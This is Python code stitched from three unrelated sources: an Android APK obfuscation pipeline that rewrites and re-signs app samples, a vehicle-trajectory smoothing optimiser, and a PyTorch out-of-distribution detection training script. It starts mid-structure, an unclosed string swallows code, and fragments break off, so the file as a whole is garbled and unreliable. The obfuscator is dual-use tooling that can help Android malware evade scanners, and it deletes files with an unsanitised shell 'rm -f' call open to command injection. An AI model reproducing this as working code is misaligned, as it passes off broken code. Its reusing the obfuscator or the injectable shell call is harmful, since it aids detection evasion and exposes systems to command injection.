'ArithmeticBranch': run_obfuscator_branch,
'Reordering': run_obfuscator_reordering,
'Reflection': run_obfuscator_reflection,
'Fields': run_obfuscator_fields,
'Manifest': run_obfuscator_manifest,
'Resource': run_obfuscator_resource,
'Raw': run_obfuscator_raw,
'Restring': run_obfuscator_restring,
'Asset': run_obfuscator_asset,
'Intercept': run_obfuscator_intercept,
'Lib': run_obfuscator_lib
}
def clean_apk(sample_file_name): # Clear the temporary apk
try:
if enable_logging:
u.logger('Apk cleaned: ' + sample_file_name)
popen('rm -f ' + sample_file_name)
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to clean ' + sample_file_name)
def obfuscate_sample(sample_file_name, obfuscator_list, sample_tf_dir):
'''This function obfuscates a sample with the obfuscators in the list, using a temporary directory as support'''
init(sample_tf_dir)
if enable_logging:
u.logger('Obfuscate Request: %s - %s - %s' % (sample_file_name, obfuscator_list, sample_tf_dir))
else:
u.logger('Obfuscate Request')
if not debug:
clean_temp(sample_tf_dir)
backsmali(sample_tf_dir, sample_file_name)
start_time = datetime.utcnow()
if enable_logging:
u.logger('Obfuscate Start: ' + str(start_time))
try:
for obfuscator_item in obfuscator_list:
obfuscator_method = obfuscator_mapping[obfuscator_item]
obfuscator_method(sample_file_name, sample_tf_dir)
except KeyError as ex:
raise e.RunningObfuscatorException('Invalid obfuscator id ' + str(ex))
end_time = datetime.utcnow()
if enable_logging:
u.logger('Obfuscate Stop: ' + str(end_time))
u.logger('Obfuscate Time: ' + str(end_time-start_time))
if cleanup:
sample_ob_file_name = sample_file_name + 'Ob'
else:
sample_ob_file_name = sample_file_name
smali(sample_tf_dir, sample_ob_file_name)
sign_apk(sample_ob_file_name)
if not debug:
clean_temp(sample_tf_dir)
if cleanup:
clean_apk(sample_file_name)
u.logger('### SUCCESS ### {' + str(end_time-start_time) + '}')
def apply_dir(filename, obfuscator_to_apply, mode=0, retry=0):
try:
obfuscate_sample(adam_base_dir + 'input/' + filename, obfuscator_to_apply, adam_base_dir + 'temp/' + filename[:-4])
sys.exit(0)
except e.AndroidLimitException as ex:
u.logger('### ERROR ### ' + str(ex) + ' ### ERROR ###')
u.logger('### WARNING ###')
if mode == 0:
apply_dir(filename, [o for o in obfuscator_to_apply if o != 'Reflection'], 1)
elif mode == 1:
apply_dir(filename, [o for o in obfuscator_to_apply if o != 'Indirections'], 2)
else:
sys.exit(1)
except e.AndroidRandomException as ex:
u.logger('### ERROR ### ' + str(ex) + ' ### ERROR ###')
if retry == 0:
u.logger('### WARNING ###')
apply_dir(filename, obfuscator_to_apply, mode, retry + 1)
else:
u.logger('### FAILURE ###')
sys.exit(2)
except Exception as ex:
u.logger('### ERROR ### ' + str(ex) + ' ### ERROR ###')
u.logger('### FAILURE ###')
sys.exit(2)
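# Fallback behaviour of apply_dir (summary comment, added for clarity): on an
# AndroidLimitException the obfuscator list is retried without 'Reflection'
# (mode 0 -> 1), then also without 'Indirections' (mode 1 -> 2), and finally the
# run exits with status 1; on an AndroidRandomException the same list is retried
# once (retry 0 -> 1) before exiting with status 2.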
'''obfuscator_to_apply = ['Resigned',
'Alignment',
'Rebuild',
'Fields',
'Debug',
'Indirections',
x: position measurements (N x 1), could have NaN
N: int number of measurements
dt: float delta T
notNan: bool array indicating timestamps that have measurements
lam: given parameter
Return: float
"""
# unpack decision variables
xhat = X[:N]
offset1 = int((1+order-1)*(order-1)/2)
highest_order_dynamics = X[order*N-offset1:] # to be regularized
rescale = (30)**(order)
# select valid measurements
xhat = xhat[notNan]
x = x[notNan]
# min perturbation
c1 = LA.norm(x-xhat,2)**2 * rescale /np.count_nonzero(notNan)
c2 = LA.norm(highest_order_dynamics,2)**2 / len(highest_order_dynamics)
cost = lam*c1 + (1-lam) * c2
return cost
def const_1d(N, dt, order):
""" The constraint representing linear dynamics
N: number of timesteps for xhat, n=3N-3
Return: matrix A (2N-3 x 3N-3), such that A dot X = [0]_(nx1)
for scipy.optimize.LinearConstraint: lb<= A.dot(X) <= ub 'trust-constr'
"""
offset = int((1+order)*order/2)
n = (order+1)*N-offset
m = order*N-offset
A = np.zeros((m,n))
for o in range(order):
offset_pre = int((1+o)*o/2)
offset_post = int((2+o)*(o+1)/2)
start_row = o*N-offset_pre
end_row = (o+1)*N-offset_post
step = N-o
for i in range(start_row, end_row):
A[i][i+o] = -1
A[i][i+o+1] = 1
A[i][i+o+step] = -dt
return A
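# Illustrative check (added; not part of the original module): for order=1 the
# rows of A encode x_{i+1} - x_i - dt*v_i = 0, i.e. first-order finite-difference
# dynamics on the stacked decision vector [x_0..x_{N-1}, v_0..v_{N-2}]. The helper
# name below is ours and only demonstrates how const_1d is meant to be used.
def _demo_const_1d(N=4, dt=1/30.):
    A = const_1d(N, dt, order=1)                  # shape (N-1, 2N-1)
    v = 20.0                                      # constant speed
    x = np.arange(N) * v * dt                     # positions consistent with v
    X = np.concatenate([x, np.full(N - 1, v)])    # stacked [x, v]
    assert np.allclose(A.dot(X), 0.0)             # dynamics satisfied exactly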
def loss(Yre, Y1, norm='l21'):
'''
different ways to compute the diff matrix
'''
notNan = ~np.isnan(np.sum(Y1,axis=-1))
Y1 = Y1[notNan,:]
Yre = Yre[notNan,:]
diff = np.abs(Y1-Yre)
N = len(diff)
if N==0:
return 0
if norm=='l21':
return np.nanmean(LA.norm(diff,axis=1))
elif norm=='l2':
return LA.norm(diff,'fro')/N
elif norm=='xy': # weighted xy
mae_x = np.abs(diff[:,[0,2,4,6]])
mae_y = np.abs(diff[:,[1,3,5,7]])
alpha = 0.3
mae_xy = alpha*mae_x + (1-alpha)*mae_y
return LA.norm(mae_xy,'fro')/N
def get_costs(Yre, Y1, x,y,v,a,theta, norm):
'''
for normalizing lambdas
'''
N = len(a)
c1m, c2m, c3m, c4m, c5m = 1,1,1,1,1 # directly calculate 2-norm
c1 = loss(Yre, Y1, norm)/c1m
c2 = LA.norm(a,2)/N/30/c2m
j = np.diff(a)
c3 = LA.norm(j,2)/N/30/c3m
st = sin(theta)
c4 = LA.norm(st,2)/N/c4m
o = np.diff(theta)
c5 = LA.norm(o,2)/N/c5m
return c1,c2,c3,c4,c5
def obj1(X, Y1,N,dt,notNan, lam1,lam2,lam3,lam4,lam5):
"""The cost function
X = [v, theta, x0, y0, w, l]^T, where v and theta are length-N arrays
penalize only theta, correction and accel
pretty accurate and faster than the previous formulation
"""
nvalid = np.count_nonzero(notNan)
# unpack
v = X[:N]
theta = X[N:2*N]
x0,y0,w,l = X[2*N:]
Yre,x,y,a = generate(w,l,x0, y0, theta,v, outputall=True)
Yre = Yre[notNan,:]
# min perturbation
c1 = lam1 * loss(Yre, Y1, 'l21')
# regularize acceleration # not the real a or j, multiply a constant dt
c2 = lam2*LA.norm(a,2)/nvalid/30
# regularize jerk
j = np.diff(a)/dt
c3 = lam3*LA.norm(j,2)/nvalid /900
# regularize angle
st = sin(theta)
c4 = lam4*LA.norm(st,2)/nvalid
# regularize angular velocity
o = np.diff(theta)/dt
c5 = lam5*LA.norm(o,2)/nvalid/30
return c1+c2+c3+c4+c5
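# In formula form (added summary of the code above), with n = number of valid
# frames: cost = lam1*mean||Yre - Y1||_2 + lam2*||a||_2/(30 n)
#              + lam3*||da/dt||_2/(900 n) + lam4*||sin(theta)||_2/n
#              + lam5*||dtheta/dt||_2/(30 n)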
def unpack1(res,N,dt):
# extract results
# unpack variables
x = np.zeros(N)
y = np.zeros(N)
# ver2 unpack
v = res.x[:N]
theta = res.x[N:2*N]
x0,y0,w,l = res.x[2*N:]
Yre, x, y, a = generate(w,l,x0, y0, theta,v, outputall=True)
return Yre, x,y,v,a,theta,w,l
def rectify_single_camera(df, args):
'''
df: a single track in one camera view
'''
lam1, lam2, lam3,lam4,lam5,niter = args
timestamps = df.Timestamp.values
dt = np.diff(timestamps)
sign = df["direction"].iloc[0]
# get bottom 4 points coordinates
Y1 = np.array(df[pts])
N = len(Y1)
notNan = ~np.isnan(np.sum(Y1,axis=-1))
Y1 = Y1[notNan,:]
if (len(Y1) <= 3):
print('Not enough valid measurements: ', df['ID'].iloc[0])
# df.loc[:,pts] = np.nan
return None
# reorder Y1 to deal with backward traveling measurements
# new_order = np.argsort(np.sum(Y1[:, [0,2,4,6]],axis=1))[::int(sign)]
# Y1 = Y1[new_order,:]
first_valid = np.where(notNan==True)[0][0]
temp = df[~df["bbr_x"].isna()]
v_bbr = (max(temp.bbr_x.values)-min(temp.bbr_x.values))/(max(temp.Timestamp.values)-min(temp.Timestamp.values))
v_fbr = (max(temp.fbr_x.values)-min(temp.fbr_x.values))/(max(temp.Timestamp.values)-min(temp.Timestamp.values))
# avgv = max(min(v_bbr,50), min(v_fbr,50))
avgv = (v_bbr+v_fbr)/2
# print(avgv)
v0 = np.array([np.abs(avgv)]*N)
x0 = (Y1[0,0]+Y1[0,6])/2- sign*avgv*first_valid*1/30
y0 = (Y1[0,1]+Y1[0,7])/2
dy = Y1[-1,1]-Y1[0,1]
dx = Y1[-1,0]-Y1[0,0]
theta0 = np.ones((N))*np.arccos(sign) # parallel to lane
# theta0 = np.ones((N))*np.arctan2(dy,dx) # average angle
# no perfect box exists
w0 = np.nanmean(np.sqrt((Y1[:,1]-Y1[:,7])**2+(Y1[:,0]-Y1[:,6])**2))
l0 = np.nanmean(np.sqrt((Y1[:,2]-Y1[:,0])**2+(Y1[:,1]-Y1[:,3])**2))
X0 = np.concatenate((v0.T, theta0.T, \
[x0,y0,w0,l0]),axis=-1)
bnds = [(0,50) for i in range(0,N)]+\
[(np.arccos(sign),np.arccos(sign)) for i in range(N)]+\
[(-np.inf,np.inf),(0,np.inf),(1,4),(2,np.inf)]
# [(-np.pi/8+np.arccos(sign),np.pi/8+np.arccos(sign)) for i in range(N)]+\
Y0 = generate(w0,l0,x0, y0, theta0,v0)
diff = Y1-Y0[notNan,:]
c1max = np.nanmean(LA.norm(diff,axis=1))
c1max = max(c1max, 1e-4)
# SOLVE FOR MAX C2-C5 BY SETTING LAM2-5 = 0
lams = (100,0,0,0,0)
minimizer_kwargs = {"method":"L-BFGS-B", "args":(Y1,N,dt,notNan,*lams),'bounds':bnds,'options':{'disp': False}}
res = basinhopping(obj1, X0, minimizer_kwargs=minimizer_kwargs,niter=0)
print('\n')
print('Initialization: ',loss(Y0[notNan,:], Y1, norm='l2'))
# extract results
Yre, x,y,v,a,theta,w,l = unpack1(res,N,dt)
Yre = Yre[notNan,:]
_,c2max,c3max,c4max,c5max = get_costs(Yre, Y1, x,y,v,a,theta,'l21')
c2max,c3max,c4max,c5max = max(c2max, 1e-4), max(c3max, 1e-4), max(c4max, 1e-4), max(c5max, 1e-4)
# SOLVE AGAIN - WITH NORMALIZED OBJECTIVES
lams = (lam1/c1max,lam2/c2max,lam3/c3max,lam4/c4max,lam5/c5max)
minimizer_kwargs = {"method":"L-BFGS-B", "args":(Y1,N,dt,notNan,*lams),'bounds':bnds,'options':{'disp': False}}
res = basinhopping(obj1, X0, minimizer_kwargs=minimizer_kwargs,niter=niter)
Yre, x,y,v,a,theta,w,l = unpack1(res,N,dt)
print('Final: ',loss(Yre[notNan,:], Y1, norm='l2'))
df.loc[:,pts] = Yre
df.loc[:,'acceleration'] = a
df.loc[:,'speed'] = v
df.loc[:,'x'] = x
df.loc[:,'y'] = y
df.loc[:,'theta'] = theta
df.loc[:,'width'] = w
df.loc[:,'length'] = l
return df
def applyParallel(dfGrouped, func, args=None):
with Pool(cpu_count()) as p:
if args is None:
ret_list = list(tqdm(p.imap(func, [group for name, group in dfGrouped]), total=len(dfGrouped.groups)))
else:# if has extra arguments
ret_list = list(tqdm(p.imap(partial(func, args=args), [group for name, group in dfGrouped]), total=len(dfGrouped.groups)))
return pd.concat(ret_list)
def rectify(df):
'''
apply obj1-based rectification to each object (ID) in the entire dataframe
'''
print('Rectifying...')
# filter out len<2
df = df.groupby("ID").filter(lambda x: len(x)>=2)
tqdm.pandas()
# lams = (1,0.2,0.2,0.05,0.02) # lambdas
lams = (1,0,0,0.1,0.1,0) # lam1: data perturbation, lam2: acceleration, lam3: jerk, lam4: theta, lam5: omega; last entry is niter
df = applyParallel(df.groupby("ID"), rectify_single_camera, args = lams).reset_index(drop=True)
# df = df.groupby('ID').apply(rectify_single_camera, args=lams).reset_index(drop=True)
return df
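# Minimal usage sketch (added; the file name here is illustrative only): rectify
# expects one row per frame with at least the columns used above -- 'ID',
# 'Timestamp', 'direction' and the eight corner coordinates in pts
# ('bbr_x','bbr_y','fbr_x','fbr_y','fbl_x','fbl_y','bbl_x','bbl_y').
#   df = pd.read_csv('tracks.csv')   # hypothetical input
#   df = rectify(df)                 # adds speed, acceleration, theta, width, length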
def rectify_receding_horizon(df):
'''
apply obj1-based rectification to each object (ID) in the entire dataframe
'''
# filter out len<2
df = df.groupby("ID").filter(lambda x: len(x)>=2)
tqdm.pandas()
# df = df.groupby("ID").progress_apply(receding_horizon_opt).reset_index(drop=True)
return df
def receding_horizon_opt(car):
'''
Y,timestamps,w,l,n,PH,IH
re-write the batch optimization (obj1 and obj2) into mini-batch optimization to save computational time
n: number of frames, assuming 30 fps
PH: prediction horizon
IH: implementation horizon
'''
w,l = estimate_dimensions(car) # use some data to estimate vehicle dimensions
# print('estimated w:',w,'l:',l)
# optimization parameters
lam1 = 1 # modification of measurement
lam2 = 1 # acceleration
lam3 = 0 # jerk
lam4 = 50 # theta
lam5 = 1 # omega
PH = 200 # optimize over Prediction Horizon frames
IH = 100 # implementation horizon
sign = car['direction'].iloc[0]
timestamps = car.Timestamp.values
pts = ['bbr_x','bbr_y', 'fbr_x','fbr_y','fbl_x','fbl_y','bbl_x', 'bbl_y']
Y = np.array(car[pts])
n = len(Y)
Yre = np.empty((0,8))
a_arr = np.empty((0,0))
x_arr = np.empty((0,0))
y_arr = np.empty((0,0))
v_arr = np.empty((0,0))
theta_arr = np.empty((0,0))
for i in range(0,n-IH,IH):
# print(i,'/',n, flush=True)
Y1 = Y[i:min(i+PH,n),:]
N = len(Y1)
notNan = ~np.isnan(np.sum(Y1,axis=-1))
# if (i>0) and (np.count_nonzero(notNan)<4): # TODO: does not work if first PH has not enough measurements!
# if not enough measurement for this PH, simply use the last round of answers
# Yre = np.vstack([Yre,Yre1[:N if i+PH>=n else PH-IH,:]])
# a_arr = np.append(a_arr,a[:N if i+PH>=n else PH-IH:])
# x_arr = np.append(x_arr,x[:N if i+PH>=n else PH-IH:])
# y_arr = np.append(y_arr,y[:N if i+PH>=n else PH-IH:])
# v_arr = np.append(v_arr,v[:N if i+PH>=n else PH-IH:])
# theta_arr = np.append(theta_arr,theta[:N if i+PH>=n else PH-IH:])
# continue
Y1 = Y1[notNan,:]
ts = timestamps[i:min(i+PH,n)]
dt = np.diff(ts)
a0 = np.zeros((N))
try:
v0 = v_arr[-1]
except IndexError: # no estimate carried over from a previous horizon
v0 = (Y1[-1,0]-Y1[0,0])/(ts[notNan][-1]-ts[notNan][0])
try:
x0 = x_arr[-1]
y0 = y_arr[-1]
except IndexError: # no estimate carried over from a previous horizon
x0 = (Y1[0,0]+Y1[0,6])/2
y0 = (Y1[0,1]+Y1[0,7])/2
v0 = np.abs(v0)
theta0 = np.ones((N))*np.arccos(sign)
X0 = np.concatenate((a0.T, theta0.T, \
[v0,x0,y0]),axis=-1)
if sign>0:
bnds = [(-5,5) for ii in range(0,N)]+\
[(-np.pi/8,np.pi/8) for ii in range(N)]+\
[(0,40),(-np.inf,np.inf),(0,np.inf)]
else:
bnds = [(-5,5) for ii in range(0,N)]+\
[(-np.pi/8+np.pi,np.pi/8+np.pi) for ii in range(N)]+\
[(0,40),(-np.inf,np.inf),(0,np.inf)]
res = minimize(obj2, X0, (Y1,N,dt,notNan,w,l,lam1,lam2,lam3,lam4,lam5), method = 'L-BFGS-B',
bounds=bnds, options={'disp': False,'maxiter':100000})#
# extract results
Yre1, x,y,v,a,theta,omega = unpack2(res,N,dt,w,l)
Yre = np.vstack([Yre,Yre1[:N if i+PH>=n else IH,:]])
a_arr = np.append(a_arr,a[:N if i+PH>=n else IH])
x_arr = np.append(x_arr,x[:N if i+PH>=n else IH])
y_arr = np.append(y_arr,y[:N if i+PH>=n else IH])
import argparse
import os
import sys
import shutil
import time
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision
import numpy as np
import models.densenet as dn
import models.wideresnet as wn
import models.gmm as gmmlib
from utils import TinyImages
import utils.svhn_loader as svhn
from sklearn import mixture
# used for logging to TensorBoard
from tensorboard_logger import configure, log_value
parser = argparse.ArgumentParser(description='PyTorch DenseNet Training')
parser.add_argument('--gpu', default='0', type=str, help='which gpu to use')
parser.add_argument('--in-dataset', default="CIFAR-10", type=str, help='in-distribution dataset')
parser.add_argument('--model-arch', default='densenet', type=str, help='model architecture')
parser.add_argument('--epochs', default=100, type=int,
help='number of total epochs to run')
parser.add_argument('--save-epoch', default=10, type=int,
help='save the model every save_epoch')
parser.add_argument('--start-epoch', default=0, type=int,
help='manual epoch number (useful on restarts)')
parser.add_argument('-b', '--batch-size', default=64, type=int,
help='mini-batch size (default: 64)')
parser.add_argument('--ood-batch-size', default=50, type=int,
help='mini-batch size (default: 50)')
parser.add_argument('--lr', '--learning-rate', default=0.1, type=float,
help='initial learning rate')
parser.add_argument('--momentum', default=0.9, type=float, help='momentum')
parser.add_argument('--weight-decay', '--wd', default=0.0001, type=float,
help='weight decay (default: 0.0001)')
parser.add_argument('--print-freq', '-p', default=10, type=int,
help='print frequency (default: 10)')
parser.add_argument('--layers', default=100, type=int,
help='total number of layers (default: 100)')
parser.add_argument('--depth', default=40, type=int,
help='depth of resnet')
parser.add_argument('--width', default=4, type=int,
help='width of resnet')
parser.add_argument('--growth', default=12, type=int,
help='number of new channels per layer (default: 12)')
parser.add_argument('--droprate', default=0.0, type=float,
help='dropout probability (default: 0.0)')
parser.add_argument('--no-augment', dest='augment', action='store_false',
help='whether to use standard augmentation (default: True)')
parser.add_argument('--reduce', default=0.5, type=float,
help='compression rate in transition stage (default: 0.5)')
parser.add_argument('--no-bottleneck', dest='bottleneck', action='store_false',
help='To not use bottleneck block')
parser.add_argument('--resume', default='', type=str,
help='path to latest checkpoint (default: none)')
parser.add_argument('--name', required=True, type=str,
help='name of experiment')
parser.add_argument('--tensorboard',
help='Log progress to TensorBoard', action='store_true')
parser.set_defaults(bottleneck=True)
parser.set_defaults(augment=True)
args = parser.parse_args()
state = {k: v for k, v in args._get_kwargs()}
print(state)
directory = "checkpoints/{in_dataset}/{name}/".format(in_dataset=args.in_dataset, name=args.name)
if not os.path.exists(directory):
os.makedirs(directory)
save_state_file = os.path.join(directory, 'args.txt')
fw = open(save_state_file, 'w')
print(state, file=fw)
fw.close()
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu
torch.manual_seed(1)
np.random.seed(1)
def main():
if args.tensorboard: configure("runs/%s"%(args.name))
if args.augment:
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
else:
transform_train = transforms.Compose([
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
kwargs = {'num_workers': 1, 'pin_memory': True}
if args.in_dataset == "CIFAR-10":
# Data loading code
normalizer = transforms.Normalize(mean=[x/255.0 for x in [125.3, 123.0, 113.9]],
std=[x/255.0 for x in [63.0, 62.1, 66.7]])
train_loader = torch.utils.data.DataLoader(
datasets.CIFAR10('./datasets/cifar10', train=True, download=True,
transform=transform_train),
batch_size=args.batch_size, shuffle=True, **kwargs)
val_loader = torch.utils.data.DataLoader(
datasets.CIFAR10('./datasets/cifar10', train=False, transform=transform_test),
batch_size=args.batch_size, shuffle=True, **kwargs)
lr_schedule=[50, 75, 90]
num_classes = 10
elif args.in_dataset == "CIFAR-100":
# Data loading code
normalizer = transforms.Normalize(mean=[x/255.0 for x in [125.3, 123.0, 113.9]],
std=[x/255.0 for x in [63.0, 62.1, 66.7]])
train_loader = torch.utils.data.DataLoader(
datasets.CIFAR100('./datasets/cifar100', train=True, download=True,
transform=transform_train),
batch_size=args.batch_size, shuffle=True, **kwargs)
val_loader = torch.utils.data.DataLoader(
datasets.CIFAR100('./datasets/cifar100', train=False, transform=transform_test),
batch_size=args.batch_size, shuffle=True, **kwargs)
lr_schedule=[50, 75, 90]
num_classes = 100
elif args.in_dataset == "SVHN":
# Data loading code
normalizer = None
train_loader = torch.utils.data.DataLoader(
svhn.SVHN('datasets/svhn/', split='train',
transform=transforms.ToTensor(), download=False),
batch_size=args.batch_size, shuffle=True, **kwargs)
val_loader = torch.utils.data.DataLoader(
svhn.SVHN('datasets/svhn/', split='test',
transform=transforms.ToTensor(), download=False),
batch_size=args.batch_size, shuffle=False, **kwargs)
args.epochs = 20
args.save_epoch = 2
lr_schedule=[10, 15, 18]
num_classes = 10
out_loader = torch.utils.data.DataLoader(
TinyImages(transform=transforms.Compose(
[transforms.ToTensor(), transforms.ToPILImage(), transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(), transforms.ToTensor()])),
batch_size=args.ood_batch_size, shuffle=False, **kwargs)
# create model
if args.model_arch == 'densenet':
base_model = dn.DenseNet3(args.layers, num_classes, args.growth, reduction=args.reduce,
bottleneck=args.bottleneck, dropRate=args.droprate, normalizer=normalizer)
elif args.model_arch == 'wideresnet':
base_model = wn.WideResNet(args.depth, num_classes, widen_factor=args.width, dropRate=args.droprate, normalizer=normalizer)
else:
assert False, 'Not supported model arch: {}'.format(args.model_arch)
gen_gmm(train_loader, out_loader, data_used=50000, PCA=True, N=[100])
gmm = torch.load("checkpoints/{in_dataset}/{name}/".format(in_dataset=args.in_dataset, name=args.name) + 'in_gmm.pth.tar')
gmm.alpha = nn.Parameter(gmm.alpha)
gmm.mu.requires_grad = True
gmm.logvar.requires_grad = True
gmm.alpha.requires_grad = False
gmm_out = torch.load("checkpoints/{in_dataset}/{name}/".format(in_dataset=args.in_dataset, name=args.name) + 'out_gmm.pth.tar')
gmm_out.alpha = nn.Parameter(gmm.alpha)
gmm_out.mu.requires_grad = True
gmm_out.logvar.requires_grad = True
gmm_out.alpha.requires_grad = False
loglam = 0.
model = gmmlib.DoublyRobustModel(base_model, gmm, gmm_out,
loglam, dim=3072,
classes=num_classes).cuda()
model.loglam.requires_grad = False
# get the number of model parameters
print('Number of model parameters: {}'.format(
sum([p.data.nelement() for p in model.parameters()])))
model = model.cuda()
criterion = nn.CrossEntropyLoss().cuda()
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
cudnn.benchmark = True
# define loss function (criterion) and optimizer
lr = args.lr
lr_gmm = 1e-5
param_groups = [{'params':model.mm.parameters(),'lr':lr_gmm, 'weight_decay':0.},
{'params':model.mm_out.parameters(),'lr':lr_gmm, 'weight_decay':0.},
{'params':model.base_model.parameters(),'lr':lr, 'weight_decay':args.weight_decay}]
optimizer = torch.optim.SGD(param_groups, momentum=args.momentum, nesterov=True)
for epoch in range(args.start_epoch, args.epochs):
adjust_learning_rate(optimizer, epoch, lr_schedule)
# train for one epoch
lam = model.loglam.data.exp().item()
train_CEDA_gmm_out(model, train_loader, out_loader, optimizer, epoch, lam=lam)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion, epoch)
# remember best prec@1 and save checkpoint
if (epoch + 1) % args.save_epoch == 0:
save_checkpoint({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
}, epoch + 1)
def gen_gmm(train_loader, out_loader, data_used=50000, PCA=True, N=[100]):
print('Generate GMM...')
start = time.time()
dim = 3072
X = []
for x, f in train_loader:
X.append(x.view(-1,dim))
X = torch.cat(X, 0)
X = X[:data_used] #needed to keep memory of distance matrix below 800 GB
if PCA:
metric = gmmlib.PCAMetric(X, p=2, min_sv_factor=1e6)
X = ( (X@metric.comp_vecs.t()) / metric.singular_values_sqrt[None,:] )
else:
metric = gmmlib.LpMetric()
for n in N:
print(n)
gmm = gmmlib.GMM(n, dim, metric=metric)
clf = mixture.GMM(n_components=n, covariance_type='spherical', params='mc')
clf.fit(X)
mu = torch.tensor(clf.means_ ,dtype=torch.float)
logvar = torch.tensor(np.log(clf.covars_[:,0]) ,dtype=torch.float)
logvar = 0.*logvar + logvar.exp().mean().log()
alpha = torch.tensor(np.log(clf.weights_) ,dtype=torch.float)
gmm = gmmlib.GMM(n, dim, mu=mu, logvar=logvar, metric=metric)
if PCA:
gmm.mu.data = ( (gmm.mu.data * metric.singular_values_sqrt[None,:] )
@ metric.comp_vecs.t().inverse() )
directory = "checkpoints/{in_dataset}/{name}/".format(in_dataset=args.in_dataset, name=args.name)
if not os.path.exists(directory):
os.makedirs(directory)
filename = directory + 'in_gmm.pth.tar'
torch.save(gmm, filename)
X = []
for idx, (x, f) in enumerate(out_loader):
if idx>400:
break
X.append(x.view(-1,dim))
X = torch.cat(X, 0)
if PCA:
X = ( (X@metric.comp_vecs.t()) / metric.singular_values_sqrt[None,:] )
for n in N:
print(n)
# Out GMM
gmm = gmmlib.GMM(n, dim, metric=metric)
clf = mixture.GMM(n_components=n, covariance_type='spherical', params='mc')
clf.fit(X)
mu = torch.tensor(clf.means_ ,dtype=torch.float)
logvar = torch.tensor(np.log(clf.covars_[:,0]) ,dtype=torch.float)
logvar = 0.*logvar + logvar.exp().mean().log()
alpha = torch.tensor(np.log(clf.weights_) ,dtype=torch.float)
gmm = gmmlib.GMM(n, dim, mu=mu, logvar=logvar, metric=metric)
if PCA:
gmm.mu.data = ( (gmm.mu.data * metric.singular_values_sqrt[None,:] )
@ metric.comp_vecs.t().inverse() )
directory = "checkpoints/{in_dataset}/{name}/".format(in_dataset=args.in_dataset, name=args.name)
if not os.path.exists(directory):
os.makedirs(directory)
filename = directory + 'out_gmm.pth.tar'
torch.save(gmm, filename)
print('Time: ', time.time() - start)
print('Done!')
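# Summary (added comment): gen_gmm fits spherical sklearn GMMs to flattened
# in-distribution images and to a slice of the OOD loader, optionally in a
# PCA-whitened space, converts them to gmmlib.GMM modules (mapping the means
# back to input space when PCA is used), and saves them as in_gmm.pth.tar and
# out_gmm.pth.tar under the experiment's checkpoint directory; main() reloads
# both to build the DoublyRobustModel.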
def train_CEDA_gmm_out(model, train_loader, ood_loader, optimizer, epoch, lam=1., verbose=10):
criterion = nn.NLLLoss()
model.train()
train_loss = 0
likelihood_loss = 0
correct = 0
margin = np.log(4.)
if ood_loader is not None:
ood_loader.dataset.offset = np.random.randint(len(ood_loader.dataset))
ood_loader_iter = iter(ood_loader)
p_in = torch.tensor(1. / (1. + lam), dtype=torch.float).cuda()
p_out = torch.tensor(lam, dtype=torch.float).cuda() * p_in
log_p_in = p_in.log()
log_p_out = p_out.log()
start = time.time()
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.cuda(), target.cuda()
noise = next(ood_loader_iter)[0].cuda()
optimizer.zero_grad()
full_data = torch.cat([data, noise], 0)
full_out = model(full_data)
full_out = F.log_softmax(full_out, dim=1)
output = full_out[:data.shape[0]]
output_adv = full_out[data.shape[0]:]
like_in_in = torch.logsumexp(model.mm(data.view(data.shape[0], -1)), 0 )
like_out_in = torch.logsumexp(model.mm(noise.view(noise.shape[0], -1)), 0 )
like_in_out = torch.logsumexp(model.mm_out(data.view(data.shape[0], -1)), 0 )
like_out_out = torch.logsumexp(model.mm_out(noise.view(noise.shape[0], -1)), 0 )
loss1 = criterion(output, target)
loss2 = -output_adv.mean()
loss3 = - torch.logsumexp(torch.stack([log_p_in + like_in_in,
log_p_out + like_in_out], 0), 0).mean()
loss4 = - torch.logsumexp(torch.stack([log_p_in + like_out_in,
log_p_out + like_out_out], 0), 0).mean()
loss = p_in*(loss1 + loss3) + p_out*(loss2 + loss4)
loss.backward()
optimizer.step()
likelihood_loss += loss3.item()
train_loss += loss.item()
_, predicted = output.max(1)
correct += predicted.eq(target).sum().item()
threshold = model.mm.logvar.max() + margin
idx = model.mm_out.logvar<threshold
model.mm_out.logvar.data[idx] = threshold
if (batch_idx % verbose == 0) and verbose>0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
print('Time: ', time.time() - start)
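# Loss composition (added summary), with p_in = 1/(1+lam) and p_out = lam/(1+lam):
#   loss1: cross-entropy of the classifier on the in-distribution batch
#   loss2: -mean log-softmax on the OOD noise batch (pushes OOD outputs to uniform)
#   loss3: -E_in  log( p_in*q_in(x) + p_out*q_out(x) )  (mixture NLL on in data)
#   loss4: -E_out log( p_in*q_in(x) + p_out*q_out(x) )  (mixture NLL on OOD data)
#   total: p_in*(loss1 + loss3) + p_out*(loss2 + loss4)
# After each optimizer step the out-GMM log-variances are clamped to at least
# max(in-GMM log-variance) + log(4), per the threshold update above.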
def validate(val_loader, model, criterion, epoch):
"""Perform validation on the validation set"""
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
input = input.cuda()
target = target.cuda()
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1 = accuracy(output.data, target, topk=(1,))[0]
losses.update(loss.data, input.size(0))
top1.update(prec1, input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
